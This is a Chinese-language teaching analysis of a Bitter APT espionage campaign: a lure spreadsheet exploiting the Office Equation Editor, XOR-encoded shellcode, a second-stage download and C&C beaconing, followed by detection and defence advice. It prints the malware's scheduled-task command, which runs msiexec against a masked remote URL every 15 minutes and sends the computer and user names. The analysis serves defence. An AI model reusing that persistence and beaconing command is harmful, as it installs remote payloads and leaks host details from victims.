APT组织Bitter网络间谍攻击活动实例分析
字数 1976 2025-08-11 17:40:32
APT组织Bitter网络间谍攻击活动实例分析教学文档
一、Bitter组织概述
Bitter(又称T-APT-17、BITTER、蔓灵花)是一个长期活跃的南亚地区APT组织,主要针对中国、巴基斯坦等国家进行攻击活动。该组织具有以下特征:
- 命名来源:早期使用的特种木马通信数据包头部以"BITTER"作为标识
- 攻击目标:主要针对政府、军工、能源等关键单位
- 攻击目的:窃取敏感数据,具有强烈的政治背景
- 活动历史:长期持续的网络间谍活动
二、攻击活动实例分析
攻击流程总览
本次攻击针对孟加拉国军事机构,采用多阶段攻击策略:
- 第一阶段:利用Office公式编辑器漏洞的恶意文档
- 第二阶段:投放名为"vc"的恶意样本
- 后续阶段:部署远程访问木马(RAT)进行网络间谍活动
第一阶段:诱饵文档攻击
1. 诱饵文档特征
- 文件名:《Repair of different csoc cstc_ china supplied system - BNS BIJOY.xls》
- 文件类型:恶意XLS文档
- 攻击手法:利用Office公式编辑器组件(EQNEDT32.EXE)漏洞
2. 漏洞利用机制
- 漏洞组件:EQNEDT32.EXE(Office公式编辑器)
- 漏洞类型:远程代码执行漏洞(如CVE-2018-0798)
- 触发方式:
- 文档包含函数
=EMBED("Equation. 3",") - 打开文档时自动调用Equation.3程序
- 通过Process Monitor可观察到EQNEDT32.EXE进程启动
- 文档包含函数
3. Shellcode分析
- 嵌入位置:文档中"Equation Native"部分
- 编码方式:使用0xFF作为XOR密钥进行异或编码
- 功能分析:
- 解码后可见明显字符串(如urlmon.dll)
- 包含下载URL:
http://***.com/vc/vc - 通过URLDownloadToFileA API下载第二阶段payload
4. 第二阶段payload部署
- 下载路径:
C:\$Drw - 重命名:fsutil.exe
- 执行方式:由EQNEDT32.EXE调用explorer.exe启动
第二阶段:恶意样本分析
1. 样本基本信息
- 文件名:vc
- 文件类型:可执行文件
- 创建时间:2022-5-11
2. C&C通信机制
-
域名解密:
- 样本中加密存储C&C域名
- 运行时解密出真实域名:
m.***.com
-
信息收集:
- 收集计算机名称和用户名
- 拼接为请求发送至C&C服务器
- 示例请求格式:
http://***.com/csslogs/vis.php?st=%computername%*%username%
3. 持久化机制
通过创建计划任务实现持久化:
- 任务名称:AdobeUpdater
- 执行频率:每15分钟一次
- 任务命令:
schtasks /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c start /min msiexec /i http://***.com/csslogs/vis.php?st=%computername%*%username% /qn /norestart" /f
三、技术要点总结
1. 攻击手法特点
- 多阶段攻击链设计
- 利用已知但未修复的Office漏洞
- 使用诱饵文档进行初始入侵
- 渐进式payload部署
- 隐蔽的持久化机制
2. 检测与防御建议
检测指标(IOC)
-
文件相关:
- 可疑XLS文档名称模式
- C:$Drw\fsutil.exe路径
- AdobeUpdater计划任务
-
网络相关:
- 域名模式:
***.com/vc/vc - 请求模式:
/csslogs/vis.php?st=
- 域名模式:
防御措施
-
漏洞防护:
- 禁用或更新Office公式编辑器组件
- 及时安装Office安全更新
-
行为监控:
- 监控EQNEDT32.EXE异常启动
- 检测可疑的计划任务创建
- 监控异常目录下的可执行文件
-
网络防护:
- 拦截已知恶意域名
- 监控异常HTTP请求模式
-
安全意识:
- 警惕来源不明的Office文档
- 培训用户识别社会工程学攻击
四、扩展分析
1. 关联攻击
- 与Sophos Labs 2019年报告关联:相似的shellcode编码方式(XOR 0xFF)
- 可能使用相同的maldoc构造器
2. 攻击演进
- 从早期简单payload投递到多阶段复杂攻击
- C&C通信机制的隐蔽性增强
- 持久化手段多样化
3. 溯源分析
- 南亚地区APT组织特征
- 政治动机明显
- 长期针对特定国家和行业
五、研究工具推荐
-
静态分析:
- PE工具(查看样本信息)
- IDA Pro(字符串分析)
- oledump(Office文档分析)
-
动态分析:
- Process Monitor(进程监控)
- x32dbg + gflags.exe(调试分析)
- Burpsuite(网络流量分析)
-
威胁情报:
- 微步在线等威胁情报平台
- 公开漏洞数据库(如CVE详情)
本教学文档全面涵盖了Bitter APT组织的攻击实例,从攻击流程到技术细节,并提供了实用的检测防御建议,可作为网络安全研究和防御工作的参考。